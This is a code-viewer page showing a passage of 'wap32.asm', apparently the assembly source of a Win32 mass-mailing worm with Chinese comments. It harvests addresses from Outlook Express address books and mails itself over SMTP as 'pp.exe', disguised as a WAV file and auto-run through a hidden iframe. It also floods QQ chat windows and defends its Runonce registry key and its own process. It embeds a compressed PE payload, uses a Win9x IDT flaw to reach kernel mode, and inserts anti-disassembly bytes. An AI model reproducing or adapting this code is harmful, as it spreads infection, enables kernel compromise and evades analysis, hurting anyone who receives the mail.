📄 wap32.asm
字号:
call [esi.KnlLRead],ebx,eax,01
pop ecx
pop edx
or eax,eax
jz short CloseDbFile
mov eax,esp
add eax,20h
cmp edi,eax
ja short ScanEmailStr
cmp cl,'@'
jz short IsMailAtFlag
cmp cl,'.'
jz short IsMailDotFlag
cmp cl,30h
jb short IsMailAddr
cmp cl,39h
jb short StoreMailChar
cmp cl,41h
jb short IsMailAddr
cmp cl,7eh
jb short StoreMailChar
IsMailAddr:
xor eax,eax
cld
stosb
cmp dh,01
jnz short ScanEmailStr
cmp dl,01
jb short ScanEmailStr
sub edi,esp
cmp edi,6
jb short ScanEmailStr
mov al,[esp]
cmp al,'@'
jz short ScanEmailStr
cmp al,'.'
jz short ScanEmailStr
call FoundMailObject,esp
jmp short ScanEmailStr
IsMailDotFlag:
inc dl
jmp short StoreMailChar
IsMailAtFlag:
inc dh
StoreMailChar:
mov al,cl
cld
stosb
jmp short ReadDbFile
CloseDbFile:
call [esi.KnlLClose],ebx
add esp,100h
EnumDbMailEnd:
popad
ret
EnumDbMail endp
EnumWabMail proc WabFile: dword
pushad
call [esi.KnlLOpen],WabFile,0
cmp eax,-1
jz short EnumWabMailEnd
mov ebx,eax
sub esp,100h
mov edi,esp
call [esi.KnlLRead],ebx,edi,100h
cmp eax,100h
jnz short CloseWabFile
mov eax,[edi+60h] ;得到Unicode邮件名偏移
call [esi.KnlLSeek],ebx,eax,0
mov ecx,[edi+64h] ;得到Unicode邮件名个数
cmp ecx,1000h
ja short CloseWabFile
ContReadWabMail:
push ecx
call [esi.KnlLRead],ebx,edi,44h ;读一个记录
sub esp,100h
mov eax,esp
call [esi.KnlWideCharToMultiByte],0,200h,edi,-1,eax,100h,0,0
call FoundMailObject,esp
add esp,100h
pop ecx
loop short ContReadWabMail
CloseWabFile:
add esp,100h
call [esi.KnlLClose],ebx
EnumWabMailEnd:
popad
ret
EnumWabMail endp
MakeMailFile proc eMail: dword,hVirFile: dword,hEmlFile: dword
local OldEsp: dword
pushad
mov OldEsp,esp
sub esp,1000h
mov edi,esp
call FormatMailHeader,edi,eMail
call [esi.KnlLWrite],hEmlFile,edi,eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
mov edi,esp
call [esi.KnlLRead],hVirFile,edi,3000h
cmp eax,-1
jz short MakeMailFileEnd
mov edx,esp
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
mov edi,esp
call AnsiToBase64,edx,eax,edi
call [esi.KnlLWrite],hEmlFile,edi,eax
mov dword ptr[esp],0a0d0a0dh
call [esi.KnlLWrite],hEmlFile,edi,4
MakeMailFileEnd:
mov esp,OldEsp
popad
mov eax,1
ret
MakeMailFile endp
SmtpSendMail proc eMail: dword,hVirFile: dword
local OldEsp: dword
local RetVal: dword
pushad
mov OldEsp,esp
mov RetVal,0
sub esp,1000h
mov edi,esp
call [esi.WsWSAStartup],101h,esp
or eax,eax
jnz SendMailQuit
call [esi.Wssocket],AF_INET,SOCK_STREAM,0
cmp eax,-1h
jz ClearSocket
mov ebx,eax
mov [edi.sin_family],AF_INET
call [esi.Wshtons],25
mov [edi.sin_port],ax
call PushSmtpSrvr
db 'btamail.net.cn',0
PushSmtpSrvr:
call [esi.Wsgethostbyname]
or eax,eax
jz CloseSocket
mov eax,[eax.h_ip]
mov eax,[eax]
mov [edi.sin_addr],eax
call [esi.Wsconnect],ebx,edi,size SOCKADDR
cmp eax,-1h
jz CloseSocket
call FormatMailHeader,edi,eMail
call [esi.Wssend],ebx,edi,eax,0
call [esi.KnlSleep],4000
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
mov edi,esp
call [esi.KnlLRead],hVirFile,edi,3000h
cmp eax,-1
jz CloseSocket
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
sub esp,1000h
mov [esp],eax
mov edx,esp
call AnsiToBase64,edi,eax,edx
mov edi,esp
call [esi.Wssend],ebx,edi,eax,0
call [esi.KnlSleep],4000
call PushMailEnd
db 0dh,0ah,'.',0dh,0ah
PushMailEnd:
pop eax
call [esi.Wssend],ebx,eax,5,0
call [esi.KnlSleep],4000
call PushMailQuit
db 'QUIT',0dh,0ah
PushMailQuit:
pop eax
call [esi.Wssend],ebx,eax,6,0
call [esi.KnlSleep],4000
mov RetVal,1
CloseSocket:
call [esi.Wsclosesocket],ebx
ClearSocket:
call [esi.WsWSACleanup]
SendMailQuit:
mov esp,OldEsp
popad
mov eax,RetVal
ret
SmtpSendMail endp
FormatMailHeader proc MailHeader: dword,eMail: dword
local MailHeaderLong: dword
pushad
mov eax,100h
sub esp,eax
mov edx,esp
push eax
call [esi.KnlGetComputerNameA],edx,esp
pop eax
call PushMailData
db 'HELO btamail.net.cn',0dh,0ah
db 'MAIL FROM: imissyou@btamail.net.cn',0dh,0ah
db 'RCPT TO: %s',0dh,0ah
db 'DATA',0dh,0ah
db 'FROM: %s@yahoo.com',0dh,0ah
db 'TO: %s',0dh,0ah
db 'SUBJECT: %s is comming!',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-type: multipart/mixed; boundary="#BOUNDARY#"',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'Content-Type: text/html',0dh,0ah
db 'Content-Transfer-Encoding: quoted-printable',0dh,0ah
db 0dh,0ah
db '<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: audio/x-wav; name="pp.exe"',0dh,0ah
db 'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-id: THE-CID',0dh,0ah
db 0dh,0ah,0
PushMailData:
pop eax
mov edi,esp
call [esi.UserwsprintfA],MailHeader,eax,eMail,edi,eMail,edi
mov esp,edi
mov MailHeaderLong,eax
add esp,100h
popad
mov eax,MailHeaderLong
ret
FormatMailHeader endp
AnsiToBase64 proc AnsiBuff: dword,AnsiSize:dword,Base64Buff:dword
local nBase64Size: dword
pushad
mov nBase64Size,0
call GetBase64Char
Base64Char db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
db 'abcdefghijklmnopqrstuvwxyz'
db '0123456789+/',0
GetBase64Char:
pop esi ;esi=Offset Base64Char
mov edi,Base64Buff
mov edx,AnsiSize
shl edx,3 ;计算总位数
xor ebx,ebx ;存索引
ContTurn:
xor eax,eax ;存数值
mov ecx,6
ContGetBit:
shl eax,1
call GetBit,AnsiBuff,ebx
dec edx
jz short GetBitOver
inc ebx
loop short ContGetBit
mov al,[esi+eax]
cld
stosb
inc nBase64Size
jmp short ContTurn
GetBitOver:
dec ecx
shl eax,cl
mov al,[esi+eax]
cld
stosb
inc nBase64Size
shr ecx,1
add nBase64Size,ecx
mov al,'=' ;位数不够添“=”号,一个等号代表两位0
cld
rep stosb
xor al,al
stosb
popad
mov eax,nBase64Size
ret
AnsiToBase64 endp
;AnsiToBase64子程序,得到一位的值
GetBit proc uses ecx edx esi,SrcStr:DWORD,nCx:DWORD
mov esi,SrcStr
mov ecx,nCx
mov edx,ecx
shr edx,3
mov dl,[esi+edx]
not cl
and cl,07h
shr dl,cl
and dl,01h
or al,dl
ret
GetBit endp
SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
db 0e9h ;静态反汇编干扰
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetSaveEspAddr
push dword ptr[edx] ;保存以前的Esp值
mov [edx],esp ;保存现在的Esp值
jmp eax
db 0e9h ;静态反汇编干扰
ClearSehFrame:
pop eax ;弹出返回地址
call GetSaveEspAddr
mov esp,[edx] ;恢复Esp值
pop dword ptr[edx] ;恢复原来的Esp值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax
db 0e9h ;静态反汇编干扰
GetSaveEspAddr:
call PushOffsetSaveEspAddr
dd ?
PushOffsetSaveEspAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame ;自动清除意外Seh
jmp ecx
db 0e9h ;静态反汇编干扰
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp
UnzipVirusToFile: ;ebx=hFile
call GetVirusZipData
db 04Dh,05Ah,050h,000h,001h,002h,000h,003h,004h,000h,001h,00Fh,000h,001h,0FFh,0FFh
db 000h,002h,0B8h,000h,007h,040h,000h,001h,01Ah,000h,022h,001h,000h,002h,0BAh,010h
db 000h,001h,00Eh,01Fh,0B4h,009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h
db 068h,069h,073h,020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h
db 020h,062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h,069h
db 06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,088h,050h,045h,000h,002h,04Ch,001h,004h
db 000h,001h,0B5h,02Ch,0EFh,082h,000h,008h,0E0h,000h,001h,08Eh,081h,00Bh,001h,002h
db 019h,000h,001h,002h,000h,003h,006h,000h,007h,010h,000h,003h,010h,000h,003h,020h
db 000h,004h,040h,000h,002h,010h,000h,003h,002h,000h,002h,001h,000h,007h,003h,000h
db 001h,00Ah,000h,006h,050h,000h,003h,004h,000h,006h,002h,000h,005h,010h,000h,002h
db 020h,000h,004h,010h,000h,002h,010h,000h,006h,010h,000h,00Ch,030h,000h,002h,04Eh
db 000h,01Ch,040h,000h,002h,00Ch,000h,053h,043h,04Fh,044h,045h,000h,005h,010h,000h
db 003h,010h,000h,003h,002h,000h,003h,006h,000h,00Eh,020h,000h,002h,060h,044h,041h
db 054h,041h,000h,005h,010h,000h,003h,020h,000h,003h,002h,000h,003h,008h,000h,00Eh
db 040h,000h,002h,0C0h,02Eh,069h,064h,061h,074h,061h,000h,003h,010h,000h,003h,030h
db 000h,003h,002h,000h,003h,00Ah,000h,00Eh,040h,000h,002h,0C0h,02Eh,072h,065h,06Ch
db 06Fh,063h,000h,003h,010h,000h,003h,040h,000h,003h,002h,000h,003h,00Ch,000h,00Eh
db 040h,000h,002h,050h,000h,0FFh,000h,0FFh,000h,0FFh,000h,06Bh,0C3h,0FFh,025h,030h
db 030h,040h,000h,0FFh,000h,0FFh,000h,0FFh,000h,0FDh,028h,030h,000h,00Ah,038h,030h
db 000h,002h,030h,030h,000h,016h,046h,030h,000h,006h,046h,030h,000h,006h,04Bh,045h
db 052h,04Eh,045h,04Ch,033h,032h,02Eh,064h,06Ch,06Ch,000h,004h,053h,06Ch,065h,065h
db 070h,000h,0FFh,000h,0B5h,010h,000h,002h,00Ch,000h,003h,003h,030h,000h,0FFh,000h
db 0FFh,000h,0FFh,000h,0F9h,000h,000h
GetVirusZipData:
pop edi ;得到压缩后的PE文件数据
ContUnZipVirus:
mov al,[edi]
inc edi
or al,al
jz short WriteVirusSomeBytes
push eax
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01
pop eax
jmp short ContUnZipVirus
WriteVirusSomeBytes:
movzx ecx,byte ptr[edi]
inc edi
jecxz UnzipVirusEnd ;持续解压,直到遇到双0
ContWriteVirusBytes:
push ecx
push eax
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01
pop eax
pop ecx
loop ContWriteVirusBytes
jmp short ContUnZipVirus
UnzipVirusEnd:
ret
db 0e9h ;静态反汇编干扰
SendQQMsg proc Param: dword
sub esp,100h
xor esi,esi
BuildQQMsg:
mov edi,esp
mov ax,0a0dh
mov ecx,12
cld
rep stosw
call PushQQMsg
mov edx,[esp+esi*4]
add esp,ecx
StoreQQMsg:
mov al,[edx]
inc edx
cld
stosb
or al,al
jnz short StoreQQMsg
call PushQQWndText
db '发送消息',0
PushQQWndText:
call GetFindWindowA
FindWindowA9x2k dd ?
GetFindWindowA:
pop eax
call [eax],0
or eax,eax
jz short WaitForQQWnd
mov ebx,eax
call GetGetWindow
GetWindow9x2k dd ?
GetGetWindow:
pop eax
call [eax],ebx,GW_CHILD
or eax,eax
jz short WaitForQQWnd
mov ebx,eax
call GetSendMessageA
SendMessageA9x2k dd ?
GetSendMessageA:
pop edi
sub esp,1000h
call [edi],ebx,WM_GETTEXT,1000h,esp
add esp,1000h
or eax,eax
jnz short WaitForQQWnd
call [edi],ebx,WM_SETTEXT,1000h,esp
inc esi
and esi,07h
jnz short WaitForQQWnd
add esp,100h
ret
WaitForQQWnd:
call GetSleep
Sleep9x2k dd ?
GetSleep:
pop eax
call [eax],500
jmp BuildQQMsg
SendQQMsg endp
db 0e9h ;静态反汇编干扰
RegisterProtectProc proc hKey:dword
mov ebx,hKey ;注册表保护过程,9x/2k实用
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'Runonce',0
GetProtectKeyName:
pop esi
push 100h
call GetAdvRegQueryValueExA
AdvRegQueryValueExA9x2k dd ?
GetAdvRegQueryValueExA:
pop eax ;读出原始值保存在堆栈中
call [eax],ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call GetAdvRegNotifyChangeKeyValue
AdvRegNotifyChangeKeyValue9x2k dd ?
GetAdvRegNotifyChangeKeyValue:
pop eax ;等待注册表改变通知
call [eax],ebx,0,4,0,0
call GetAdvRegSetValueExA
AdvRegSetValueExA9x2k dd ?
GetAdvRegSetValueExA:
pop eax ;还原原始值
call [eax],ebx,esi,0,1,edi,100h
jmp short WaitRegChangeNotify
RegisterProtectProc endp
db 0e9h ;静态反汇编干扰
ProcessProtectProc proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess9x2k dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,0,ProcID
or eax,eax ;打开进程
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject9x2k dd ?
GetKnlWaitForSingleObject:
pop eax ;等待进程结束
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FullPath-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec9x2k dd ?
GetKnlWinExec:
pop eax ;重起病毒进程
call [eax],ecx,01
ExitProtectProc:
ret
ProcessProtectProc endp
ProcessProtectProcSize=$-offset ProcessProtectProc
FullPath db 0e9h
MoveDataToKnl proc Src:dword,Des:dword,nCx:dword
pushad
push eax
sidt [esp-2]
pop eax
add eax,3*8 ;IDT03号
mov ebx,[eax]
mov edx,[eax+4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax+4],edx
cld
rep movsb ;复制代码/数据到内核代码指定位置
popad
iret
SetIdt03:
cli
pop word ptr[eax]
pop word ptr[eax+6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3; ;利用Win9x,IDT漏洞进入系统内核
sti
popad
ret
MoveDataToKnl endp
db 0e9h ;静态反汇编干扰
DbgMsg proc pMsg:dword
pushad
mov eax,pMsg
call [esi.UserMessageBoxA],0,eax,eax,0
popad
ret
DbgMsg endp
dd 0,0
VirusEnd:
;这里是变形解密代码
ret
.code
Msg db 'Virus has running ok',0
Exit:
call MessageBoxA,0,offset Msg,offset Msg,0
call ExitProcess,L 0
end Start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -